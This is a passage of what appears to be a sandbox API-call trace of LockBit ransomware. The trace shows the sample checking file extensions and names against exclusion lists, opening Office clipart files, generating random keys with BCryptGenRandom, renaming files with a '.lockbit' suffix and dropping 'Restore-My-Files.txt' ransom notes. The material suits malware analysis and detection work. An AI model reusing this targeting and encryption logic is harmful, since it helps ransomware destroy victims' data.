-1 [0177.239] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.239] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.240] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.240] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02465_.WMF") returned -1 [0177.241] lstrcmpiW (lpString1="ntldr", lpString2="SO02465_.WMF") returned -1 [0177.241] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02465_.WMF") returned -1 [0177.241] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02465_.WMF") returned -1 [0177.241] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02465_.WMF") returned -1 [0177.241] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02465_.WMF") returned 1 [0177.241] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02465_.WMF") returned -1 [0177.241] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.241] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF") returned=".WMF" [0177.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.241] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.241] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.242] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.242] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF.lockbit") returned 72 [0177.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02465_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.243] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.243] malloc (_Size=0x40068) returned 0x3df0008 [0177.243] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1396) returned 1 [0177.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.244] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.248] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.248] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.248] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.249] free (_Block=0x1fa2ed8) [0177.249] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02465_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.249] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.251] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x19ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02578_.WMF", cAlternateFileName="")) returned 1 [0177.251] lstrcmpiW (lpString1=".", lpString2="SO02578_.WMF") returned -1 [0177.251] lstrcmpiW (lpString1="..", lpString2="SO02578_.WMF") returned -1 [0177.251] PathFindExtensionW (pszPath="SO02578_.WMF") returned=".WMF" [0177.251] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.251] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.252] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.253] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.253] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02578_.WMF") returned -1 [0177.253] lstrcmpiW (lpString1="ntldr", lpString2="SO02578_.WMF") returned -1 [0177.253] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02578_.WMF") returned -1 [0177.253] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02578_.WMF") returned -1 [0177.253] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02578_.WMF") returned -1 [0177.253] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02578_.WMF") returned 1 [0177.253] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02578_.WMF") returned -1 [0177.254] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.254] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF") returned=".WMF" [0177.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.254] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.254] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.254] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF.lockbit") returned 72 [0177.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02578_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.256] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.257] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.257] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6602) returned 1 [0177.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.258] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.260] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.260] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.262] free (_Block=0x1fa2ed8) [0177.262] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02578_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.262] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.262] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6d32800, ftCreationTime.dwHighDateTime=0x1bd4c4e, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6d32800, ftLastWriteTime.dwHighDateTime=0x1bd4c4e, nFileSizeHigh=0x0, nFileSizeLow=0x5fec, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02617_.WMF", cAlternateFileName="")) returned 1 [0177.262] lstrcmpiW (lpString1=".", lpString2="SO02617_.WMF") returned -1 [0177.262] lstrcmpiW (lpString1="..", lpString2="SO02617_.WMF") returned -1 [0177.262] PathFindExtensionW (pszPath="SO02617_.WMF") returned=".WMF" [0177.262] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.262] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.263] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.263] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02617_.WMF") returned -1 [0177.264] lstrcmpiW (lpString1="ntldr", lpString2="SO02617_.WMF") returned -1 [0177.264] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02617_.WMF") returned -1 [0177.264] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02617_.WMF") returned -1 [0177.264] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02617_.WMF") returned -1 [0177.264] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02617_.WMF") returned 1 [0177.264] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02617_.WMF") returned -1 [0177.264] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF") returned=".WMF" [0177.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.264] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.264] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.265] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.265] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF.lockbit") returned 72 [0177.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02617_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0177.267] CreateIoCompletionPort (FileHandle=0x3cc, 